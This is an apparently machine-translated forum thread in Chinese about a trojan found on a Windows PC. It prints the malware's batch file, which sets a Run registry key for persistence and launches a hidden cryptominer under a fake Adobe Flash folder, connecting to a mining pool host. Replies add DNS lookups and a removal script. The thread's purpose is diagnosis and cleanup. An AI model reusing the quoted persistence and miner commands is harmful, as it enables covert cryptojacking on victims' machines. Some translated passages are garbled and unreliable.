Batch file 解释特洛伊bat文件

一天早上，我的系统真的很慢。任务管理器显示Internet下载管理器正在运行，尽管我从未安装过它。我在“用户/（我的帐户）/appdata/roaming/adobe/flashplayer/purecache”中找到了它的位置。它占用了相当多的CPU

网上搜索显示，可能是某种恶意软件脚本在运行。每当我早上通过注册表中的一个条目启动时，它就会自动启动。我不知道它在我的系统上有多长时间了

启动它的bat文件是：

@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

与bat文件位于同一文件夹中的vbs脚本文件为：

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

我已经从我的系统中删除了所有的条目，但我担心可能发生了什么，因为我不知道这在我的系统上已经有多长时间了

我知道这是某种特洛伊木马。但是有人能帮我解释一下bat和脚本文件，以及它们发送给ns1.eaglecould.su的信息吗

多谢各位

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\Users\David Candy>nslookup -type=all ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
ns1.eaglecloud.su       internet address = 95.47.160.203

(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx ns1.eaglecloud.su
Server:  vodafonemobile.vmb
Address:  192.168.1.1

eaglecloud.su
        primary name server = fred.ns.cloudflare.com
        responsible mail addr = dns.cloudflare.com
        serial  = 2015717786
        refresh = 10000 (2 hours 46 mins 40 secs)
        retry   = 2400 (40 mins)
        expire  = 604800 (7 days)
        default TTL = 3600 (1 hour)
(root)  ??? unknown type 41 ???

C:\Users\David Candy>nslookup -type=mx cloudflare.com
Server:  vodafonemobile.vmb
Address:  192.168.1.1

Non-authoritative answer:
cloudflare.com  MX preference = 30, mail exchanger = alt2.aspmx.l.google.com
cloudflare.com  MX preference = 40, mail exchanger = aspmx2.googlemail.com
cloudflare.com  MX preference = 50, mail exchanger = aspmx3.googlemail.com
cloudflare.com  MX preference = 10, mail exchanger = aspmx.l.google.com
cloudflare.com  MX preference = 20, mail exchanger = alt1.aspmx.l.google.com

aspmx2.googlemail.com   internet address = 74.125.193.26
aspmx3.googlemail.com   internet address = 74.125.196.26
aspmx.l.google.com      internet address = 74.125.25.26
alt1.aspmx.l.google.com internet address = 74.125.193.27
alt2.aspmx.l.google.com internet address = 74.125.196.27
(root)  ??? unknown type 41 ???

---

我会向Cloudflare和Google抱怨这一点，因为他们正在使用他们的基础设施。

很抱歉唤醒了一个古老的话题，但我遇到了同样的问题。不过我有一个解决办法。幸运的是，它不是特洛伊木马

此恶意软件模拟Adobe updater实用程序。但是，Adobe始终对其生产程序进行数字签名。它是一家比特币矿商。我通过查找用于与internet通信的地层+tcp协议发现了这一点。这篇文章返回了一页关于比特币矿商的结果

批处理文件实际上是在注册表中创建一个新条目，以便矿工在您登录时自动启动。这家矿商利用您的CPU能力为在线货币比特币（Bitcoin）挖掘哈希值，类似于您的国家印刷纸币的方式。据我所知，它不涉及任何个人文件

删除注册表项和相关文件对我来说都会杀死它。下面是一个批处理脚本，它可以为您完成所有这些

@echo off
echo Starting removal. Please make sure that you've closed IDMan.exe
pause
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AdobeFlashPlayer /f
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs"
del "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe"
del "%appdata%\Adobe\Flash Player\PureCache\libcurl.dll"
del "%appdata%\Adobe\Flash Player\PureCache\pthreadGC2.dll"
del "%appdata%\Adobe\Flash Player\PureCache\zlib1.dll"
echo Removal complete.
pause

---

将它粘贴到批处理文件中，您应该可以开始了。

没有任何线索表明“IDMan.exe”可以做什么，我可以看到它每次都是如何启动的-修改注册表项

HKCU\software\microsoft\windows\currentversion\run

（当我想知道系统的启动方式时，我会在这里查看）.谷歌可能会停止提供电子邮件服务，但据我所知，（）。